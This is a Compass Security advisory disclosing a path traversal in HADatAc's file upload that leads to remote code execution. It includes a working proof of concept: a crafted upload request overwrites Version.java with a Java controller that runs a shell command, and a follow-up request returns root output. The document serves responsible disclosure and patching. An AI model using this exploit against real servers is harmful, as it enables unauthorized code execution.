############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: HADatAc [1] # CSNC ID: CSNC-2018-031 # Subject: Remote code execution # Risk: High # Effect: Remotely exploitable # Author: Lukasz D. (advisories@compass-security.com) # Date: 14.11.2018 # ############################################################# Introduction: ------------- HADatAc (Human-Aware Data Acquisition framework) is an open-source infrastructure that enables combined acquisitions of data and metadata in a way that metadata is properly and logically connected to data. HADatAc is built mainly for scientific research teams but can be used by anyone handling incoming data sets of physical measurements. [1] Servers running the HADatAc framework were found to be vulnerable to a remote code execution attack. Users of the framework could manipulate the file upload process and overwrite arbitrary files on the server. Consequently, an attacker could replace source code files of HADatAc and trick the server to execute malicious code. Affected: --------- The following HADatAc versions are vulnerable: - 1.0.1 - 1.0.22 Technical Description: ---------------------- The framework tries to store user-provided files inside the "unprocessed_csv" folder. However, the path where the uploaded file will be saved is constructed using a parameter in the request. As such, an attacker can perform a path traversal attack and make the server save the uploaded files in arbitrary locations on the server. In particular, files with HADatAc code may be overwritten with user-provided content. If HADatAc is running in the Development mode, it sufficies to overwrite one of the Java source files. Request to overwrite the Version.java file: POST /hadatac/annotator/uploadfile?resumableChunkNumber=1&resumableChunkSize=1& resumableCurrentChunkSize=1&resumableTotalSize=1&resumableType=1& resumableIdentifier=1&resumableRelativePath=1& resumableFilename=../app/org/hadatac/console/controllers/Version.java HTTP/1.1 Host: [CUT] Content-Type: application/octet-stream Content-Length: 546 Cookie: PLAY_SESSION=[CUT] Connection: close package org.hadatac.console.controllers; import play.mvc.Controller; import play.mvc.Result; import java.io.*; public class Version extends Controller { public Result index() { try { Process p = Runtime.getRuntime().exec("id"); InputStreamReader isr = new InputStreamReader(p.getInputStream()); BufferedReader stdInput = new BufferedReader(isr); return ok("Output: " + stdInput.readLine()); } catch (IOException e) {} return ok("Command Error"); } public Result postIndex() { return index(); } } Response: HTTP/1.1 200 OK Content-Length: 15 Content-Type: text/plain; charset=utf-8 Connection: close Date: Mon, 01 Oct 2018 13:37:13 GMT Upload finished Request to execute the uploaded file: GET /hadatac/version HTTP/1.1 Host: [CUT] Cookie: PLAY_SESSION=[CUT] Connection: close Response shows that the command present in the uploaded file was executed: HTTP/1.1 200 OK Content-Length: 46 Content-Type: text/plain; charset=utf-8 Connection: close Date: Mon, 01 Oct 2018 13:37:37 GMT Output: uid=0(root) gid=0(root) groups=0(root) If HADatAc is deployed in the Production mode, a JAR file present in ../lib/ directory has to be overwritten. Workaround / Fix: ----------------- It needs to be ensured that all files uploaded by HADatAc users are stored in the intended directory, by validating the filename and thus preventing path traversal attacks. Moreover, only expected types of files should be accepted by the server. Timeline: --------- 2018-10-01: Vulnerability discovered 2018-10-01: Initial vendor notification 2018-10-16: Initial vendor response 2018-10-25: Patched version released [2] 2018-11-14: Public disclosure References: ----------- [1]: https://www.hadatac.org [2]: https://github.com/paulopinheiro1234/hadatac/commit/1b621e06984eddeef995ba88916d9f44965e21a4